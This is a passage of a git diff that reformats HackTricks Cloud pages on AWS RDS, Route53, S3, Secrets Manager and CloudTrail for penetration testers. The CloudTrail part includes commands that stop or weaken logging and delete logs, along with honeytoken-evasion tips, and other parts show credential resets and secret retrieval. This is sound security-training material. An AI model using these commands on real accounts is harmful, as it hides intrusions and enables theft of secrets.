RDS to manage it in **AWS Secret Manager** encrypted with a KMS key +- **Indicate** a **password** yourself +- Tell RDS to **auto generate** it +- Tell RDS to manage it in **AWS Secret Manager** encrypted with a KMS key -
+
### Authentication There are 3 types of authentication options, but using the **master password is always allowed**: -
+
### Public Access & VPC @@ -71,21 +58,20 @@ Alongside the encryption capabilities inherent to RDS at the application level, To utilize TDE, certain preliminary steps are required: 1. **Option Group Association**: - * The database must be associated with an option group. Option groups serve as containers for settings and features, facilitating database management, including security enhancements. - * However, it's important to note that option groups are only available for specific database engines and versions. + - The database must be associated with an option group. Option groups serve as containers for settings and features, facilitating database management, including security enhancements. + - However, it's important to note that option groups are only available for specific database engines and versions. 2. **Inclusion of TDE in Option Group**: - * Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group. - * It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed. + - Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group. + - It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed. 3. **TDE Encryption Modes**: - * TDE offers two distinct encryption modes: - * **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection. - * **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted. + - TDE offers two distinct encryption modes: + - **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection. + - **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted. Understanding these prerequisites and the operational intricacies of TDE is crucial for effectively implementing and managing encryption within RDS, ensuring both data security and compliance with necessary standards. ### Enumeration -{% code overflow="wrap" %} ```bash # Clusters info ## Get Endpoints, username, port, iam auth enabled, attached roles, SG @@ -104,7 +90,7 @@ aws rds describe-db-security-groups aws rds describe-db-instance-automated-backups ## Find snapshots -aws rds describe-db-snapshots +aws rds describe-db-snapshots aws rds describe-db-snapshots --include-public --snapshot-type public ## Restore snapshot as new instance aws rds restore-db-instance-from-db-snapshot --db-instance-identifier --db-snapshot-identifier --availability-zone us-west-2a @@ -120,49 +106,37 @@ aws rds describe-db-proxy-targets ## reset credentials of MasterUsername aws rds modify-db-instance --db-instance-identifier --master-user-password --apply-immediately ``` -{% endcode %} ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md" %} -[aws-rds-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md +{{#endref}} ### Privesc -{% content-ref url="../aws-privilege-escalation/aws-rds-privesc.md" %} -[aws-rds-privesc.md](../aws-privilege-escalation/aws-rds-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-rds-privesc.md +{{#endref}} ### Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-rds-post-exploitation.md" %} -[aws-rds-post-exploitation.md](../aws-post-exploitation/aws-rds-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-rds-post-exploitation.md +{{#endref}} ### Persistence -{% content-ref url="../aws-persistence/aws-rds-persistence.md" %} -[aws-rds-persistence.md](../aws-persistence/aws-rds-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-rds-persistence.md +{{#endref}} ### SQL Injection There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**. -{% embed url="https://book.hacktricks.xyz/pentesting-web/sql-injection" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/sql-injection +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md new file mode 100644 index 000000000..2d806cac0 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md @@ -0,0 +1,31 @@ +# AWS - Route53 Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Route 53 + +Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\ +You can create https, http and tcp **health checks for web pages** via Route53. + +### IP-based routing + +This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\ +IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**. + +### Enumeration + +```bash +aws route53 list-hosted-zones # Get domains +aws route53 get-hosted-zone --id +aws route53 list-resource-record-sets --hosted-zone-id # Get all records +aws route53 list-health-checks +aws route53 list-traffic-policies +``` + +### Privesc + +{{#ref}} +../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md similarity index 69% rename from pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md index 8f64145bd..782731590 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md @@ -1,19 +1,6 @@ # AWS - S3, Athena & Glacier Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## S3 @@ -47,16 +34,15 @@ A presigned URL can be **created from the cli using credentials of a principal w aws s3 presign --region 's3:///' ``` -{% hint style="info" %} -The only required permission to generate a presigned URL is the permission being given, so for the previous command the only permission needed by the principal is `s3:GetObject` -{% endhint %} +> [!NOTE] +> The only required permission to generate a presigned URL is the permission being given, so for the previous command the only permission needed by the principal is `s3:GetObject` It's also possible to create presigned URLs with **other permissions**: ```python import boto3 url = boto3.client('s3').generate_presigned_url( - ClientMethod='put_object', + ClientMethod='put_object', Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'}, ExpiresIn=3600 ) @@ -72,12 +58,12 @@ url = boto3.client('s3').generate_presigned_url( This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key. -* Encryption: - * Object Data + created plaintext DEK --> Encrypted data (stored inside S3) - * Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory -* Decryption: - * Encrypted DEK + S3 Master Key --> Plaintext DEK - * Plaintext DEK + Encrypted data --> Object Data +- Encryption: + - Object Data + created plaintext DEK --> Encrypted data (stored inside S3) + - Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory +- Decryption: + - Encrypted DEK + S3 Master Key --> Plaintext DEK + - Plaintext DEK + Encrypted data --> Object Data Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control. @@ -89,14 +75,14 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail. -* Encryption: - * S3 request data keys from KMS CMK - * KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to S£ - * S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key -* Decryption: - * S3 ask to KMS to decrypt the encrypted data key of the object - * KMS decrypt the data key with the CMK and send it back to S3 - * S3 decrypts the object data +- Encryption: + - S3 request data keys from KMS CMK + - KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to S£ + - S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key +- Decryption: + - S3 ask to KMS to decrypt the encrypted data key of the object + - KMS decrypt the data key with the CMK and send it back to S3 + - S3 decrypts the object data
@@ -106,15 +92,15 @@ This method allows S3 to use the key management service to generate your data en This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you. -* Encryption: - * The user sends the object data + Customer key to S3 - * The customer key is used to encrypt the data and the encrypted data is stored - * a salted HMAC value of the customer key is stored also for future key validation - * the customer key is deleted from memory -* Decryption: - * The user send the customer key - * The key is validated against the HMAC value stored - * The customer provided key is then used to decrypt the data +- Encryption: + - The user sends the object data + Customer key to S3 + - The customer key is used to encrypt the data and the encrypted data is stored + - a salted HMAC value of the customer key is stored also for future key validation + - the customer key is deleted from memory +- Decryption: + - The user send the customer key + - The key is validated against the HMAC value stored + - The customer provided key is then used to decrypt the data
@@ -124,15 +110,15 @@ This option gives you the opportunity to provide your own master key that you ma Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored. -* Encryption: - * Client request for a data key to KMS - * KMS returns the plaintext DEK and the encrypted DEK with the CMK - * Both keys are sent back - * The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3) -* Decryption: - * The encrypted data with the encrypted DEK is sent to the client - * The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK - * The client can now decrypt the encrypted data +- Encryption: + - Client request for a data key to KMS + - KMS returns the plaintext DEK and the encrypted DEK with the CMK + - Both keys are sent back + - The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3) +- Decryption: + - The encrypted data with the encrypted DEK is sent to the client + - The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK + - The client can now decrypt the encrypted data @@ -142,13 +128,13 @@ Similarly to SSE-KMS, this also uses the key management service to generate your Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. -* Encryption: - * The client generates a DEK and encrypts the plaintext data - * Then, using it's own custom CMK it encrypts the DEK - * submit the encrypted data + encrypted DEK to S3 where it's stored -* Decryption: - * S3 sends the encrypted data and DEK - * As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data +- Encryption: + - The client generates a DEK and encrypts the plaintext data + - Then, using it's own custom CMK it encrypts the DEK + - submit the encrypted data + encrypted DEK to S3 where it's stored +- Decryption: + - S3 sends the encrypted data and DEK + - As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data @@ -255,34 +241,34 @@ You can access an S3 bucket through a dual-stack endpoint by using a virtual hos Dual-stack endpoints use the following syntax: -* `bucketname.s3.dualstack.aws-region.amazonaws.com` -* `s3.dualstack.aws-region.amazonaws.com/bucketname` +- `bucketname.s3.dualstack.aws-region.amazonaws.com` +- `s3.dualstack.aws-region.amazonaws.com/bucketname` ### Privesc In the following page you can check how to **abuse S3 permissions to escalate privileges**: -{% content-ref url="../aws-privilege-escalation/aws-s3-privesc.md" %} -[aws-s3-privesc.md](../aws-privilege-escalation/aws-s3-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-s3-privesc.md +{{#endref}} ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md" %} -[aws-s3-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md +{{#endref}} ### S3 Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-s3-post-exploitation.md" %} -[aws-s3-post-exploitation.md](../aws-post-exploitation/aws-s3-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-s3-post-exploitation.md +{{#endref}} ### Persistence -{% content-ref url="../aws-persistence/aws-s3-persistence.md" %} -[aws-s3-persistence.md](../aws-persistence/aws-s3-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-s3-persistence.md +{{#endref}} ## Other S3 vulns @@ -328,20 +314,7 @@ aws athena start-query-execution --query-string ## References -* [https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3](https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3) -* [https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html) +- [https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3](https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3) +- [https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md new file mode 100644 index 000000000..282f983cb --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md @@ -0,0 +1,50 @@ +# AWS - Secrets Manager Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## AWS Secrets Manager + +AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications. + +The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions. + +The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies. + +For granting access to secrets to a user from a different AWS account, it's necessary to: + +1. Authorize the user to access the secret. +2. Grant permission to the user to decrypt the secret using KMS. +3. Modify the Key policy to allow the external user to utilize it. + +**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** + +### **Enumeration** + +```bash +aws secretsmanager list-secrets #Get metadata of all secrets +aws secretsmanager list-secret-version-ids --secret-id # Get versions +aws secretsmanager describe-secret --secret-id # Get metadata +aws secretsmanager get-secret-value --secret-id # Get value +aws secretsmanager get-secret-value --secret-id --version-id # Get value of a different version +aws secretsmanager get-resource-policy --secret-id --secret-id +``` + +### Privesc + +{{#ref}} +../aws-privilege-escalation/aws-secrets-manager-privesc.md +{{#endref}} + +### Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-secrets-manager-post-exploitation.md +{{#endref}} + +### Persistence + +{{#ref}} +../aws-persistence/aws-secrets-manager-persistence.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md similarity index 100% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md similarity index 66% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md index 4d1861534..1bfc0a4ef 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md @@ -1,19 +1,6 @@ # AWS - CloudTrail Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## **CloudTrail** @@ -21,16 +8,16 @@ AWS CloudTrail **records and monitors activity within your AWS environment**. It Each logged event contains: -* The name of the called API: `eventName` -* The called service: `eventSource` -* The time: `eventTime` -* The IP address: `SourceIPAddress` -* The agent method: `userAgent`. Examples: - * Signing.amazonaws.com - From AWS Management Console - * console.amazonaws.com - Root user of the account - * lambda.amazonaws.com - AWS Lambda -* The request parameters: `requestParameters` -* The response elements: `responseElements` +- The name of the called API: `eventName` +- The called service: `eventSource` +- The time: `eventTime` +- The IP address: `SourceIPAddress` +- The agent method: `userAgent`. Examples: + - Signing.amazonaws.com - From AWS Management Console + - console.amazonaws.com - Root user of the account + - lambda.amazonaws.com - AWS Lambda +- The request parameters: `requestParameters` +- The response elements: `responseElements` Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\ CloudTrails logs can be **aggregated across accounts and across regions.**\ @@ -41,37 +28,36 @@ Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S The logs are stored in a **S3 bucket with this name format**: -* **`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD`** -* Being the BucketName: **`aws-cloudtrail-logs--`** -* Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`** +- **`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD`** +- Being the BucketName: **`aws-cloudtrail-logs--`** +- Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`** Inside each folder each log will have a **name following this format**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`** Log File Naming Convention -![](<../../../../.gitbook/assets/image (122).png>) +![](<../../../../images/image (122).png>) Moreover, **digest files (to check file integrity)** will be inside the **same bucket** in: -![](<../../../../.gitbook/assets/image (195).png>) +![](<../../../../images/image (195).png>) ### Aggregate Logs from Multiple Accounts -* Create a Trial in the AWS account where you want the log files to be delivered to -* Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access -* Create a new Trail in the other AWS accounts and select to use the created bucket in step 1 +- Create a Trial in the AWS account where you want the log files to be delivered to +- Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access +- Create a new Trail in the other AWS accounts and select to use the created bucket in step 1 However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account. -{% hint style="danger" %} -Remember that an account can have **different Trails** from CloudTrail **enabled** storing the same (or different) logs in different buckets. -{% endhint %} +> [!CAUTION] +> Remember that an account can have **different Trails** from CloudTrail **enabled** storing the same (or different) logs in different buckets. ### Cloudtrail from all org accounts into 1 When creating a CloudTrail, it's possible to indicate to get activate cloudtrail for all the accounts in the org and get the logs into just 1 bucket: -
+
This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect). @@ -79,25 +65,23 @@ This way you can easily configure CloudTrail in all the regions of all the accou You can check that the logs haven't been altered by running -{% code overflow="wrap" %} ```javascript aws cloudtrail validate-logs --trail-arn --start-time [--end-time ] [--s3-bucket ] [--s3-prefix ] [--verbose] ``` -{% endcode %} ### Logs to CloudWatch **CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\ Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to: -* CreateLogStream: This allows to create a CloudWatch Logs log streams -* PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream +- CreateLogStream: This allows to create a CloudWatch Logs log streams +- PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream ### Event History CloudTrail Event History allows you to inspect in a table the logs that have been recorded: -![](<../../../../.gitbook/assets/image (89).png>) +![](<../../../../images/image (89).png>) ### Insights @@ -116,11 +100,10 @@ The insights are stored in the same bucket as the CloudTrail logs in: `BucketNam AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its insights**. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to **show when services were last accessed**. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about **refining permissions**, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns. -{% hint style="success" %} -Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them -{% endhint %} +> [!TIP] +> Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them -
+
## Actions @@ -161,7 +144,9 @@ print(response) For more information about CSV Injections check the page: -{% embed url="https://book.hacktricks.xyz/pentesting-web/formula-injection" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/formula-injection +{{#endref}} For more information about this specific technique check [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/) @@ -171,15 +156,15 @@ For more information about this specific technique check [https://rhinosecurityl Honeyokens are created to **detect exfiltration of sensitive information**. In case of AWS, they are **AWS keys whose use is monitored**, if something triggers an action with that key, then someone must have stolen that key. -However, Honeytokens like the ones created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new\&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) are either using recognizable account name or using the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making Cloudtrail create any log, **you could know if the key is a honeytoken or not**. +However, Honeytokens like the ones created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) are either using recognizable account name or using the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making Cloudtrail create any log, **you could know if the key is a honeytoken or not**. -[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has some rules to detect if a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new\&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:** +[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has some rules to detect if a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:** -* If **`canarytokens.org`** appears in the role name or the account ID **`534261010715`** appears in the error message. - * Testing them more recently, they are using the account **`717712589309`** and still has the **`canarytokens.com`** string in the name. -* If **`SpaceCrab`** appears in the role name in the error message -* **SpaceSiren** uses **uuids** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}` -* If the **name looks like randomly generated**, there are high probabilities that it's a HoneyToken. +- If **`canarytokens.org`** appears in the role name or the account ID **`534261010715`** appears in the error message. + - Testing them more recently, they are using the account **`717712589309`** and still has the **`canarytokens.com`** string in the name. +- If **`SpaceCrab`** appears in the role name in the error message +- **SpaceSiren** uses **uuids** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}` +- If the **name looks like randomly generated**, there are high probabilities that it's a HoneyToken. #### Get the account ID from the Key ID @@ -190,14 +175,14 @@ import base64 import binascii def AWSAccount_from_AWSKeyID(AWSKeyID): - + trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix x = base64.b32decode(trimmed_AWSKeyID) #base32 decode y = x[0:6] - + z = int.from_bytes(y, byteorder='big', signed=False) mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) - + e = (z & mask)>>7 return (e) @@ -218,13 +203,12 @@ In the past there were some **AWS services that doesn't send logs to CloudTrail* This way, an **attacker can obtain the ARN of the key without triggering any log**. In the ARN the attacker can see the **AWS account ID and the name**, it's easy to know the HoneyToken's companies accounts ID and names, so this way an attacker can identify id the token is a HoneyToken. -![](<../../../../.gitbook/assets/image (93).png>) +![](<../../../../images/image (93).png>) -{% hint style="danger" %} -Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own... - -For more information check the [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/). -{% endhint %} +> [!CAUTION] +> Note that all public APIs discovered to not being creating CloudTrail logs are now fixed, so maybe you need to find your own... +> +> For more information check the [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/). ### Accessing Third Infrastructure @@ -234,9 +218,9 @@ Therefore, a user with access to EKS that has discovered the URL of the EKS API More info in: -{% content-ref url="../../aws-post-exploitation/aws-eks-post-exploitation.md" %} -[aws-eks-post-exploitation.md](../../aws-post-exploitation/aws-eks-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../../aws-post-exploitation/aws-eks-post-exploitation.md +{{#endref}} ### Modifying CloudTrail Config @@ -254,15 +238,12 @@ aws cloudtrail stop-logging --name [trail-name] #### Disable multi-region logging -{% code overflow="wrap" %} ```bash aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services ``` -{% endcode %} #### Disable Logging by Event Selectors -{% code overflow="wrap" %} ```bash # Leave only the ReadOnly selector aws cloudtrail put-event-selectors --trail-name --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region @@ -270,7 +251,6 @@ aws cloudtrail put-event-selectors --trail-name --event-selectors ' # Remove all selectors (stop Insights) aws cloudtrail put-event-selectors --trail-name --event-selectors '[]' --region ``` -{% endcode %} In the first example, a single event selector is provided as a JSON array with a single object. The `"ReadWriteType": "ReadOnly"` indicates that the **event selector should only capture read-only events** (so CloudTrail insights **won't be checking write** events for example). @@ -278,18 +258,16 @@ You can customize the event selector based on your specific requirements. #### Logs deletion via S3 lifecycle policy -{% code overflow="wrap" %} ```bash aws s3api put-bucket-lifecycle --bucket --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region ``` -{% endcode %} ### Modifying Bucket Configuration -* Delete the S3 bucket -* Change bucket policy to deny any writes from the CloudTrail service -* Add lifecycle policy to S3 bucket to delete objects -* Disable the kms key used to encrypt the CloudTrail logs +- Delete the S3 bucket +- Change bucket policy to deny any writes from the CloudTrail service +- Add lifecycle policy to S3 bucket to delete objects +- Disable the kms key used to encrypt the CloudTrail logs ### 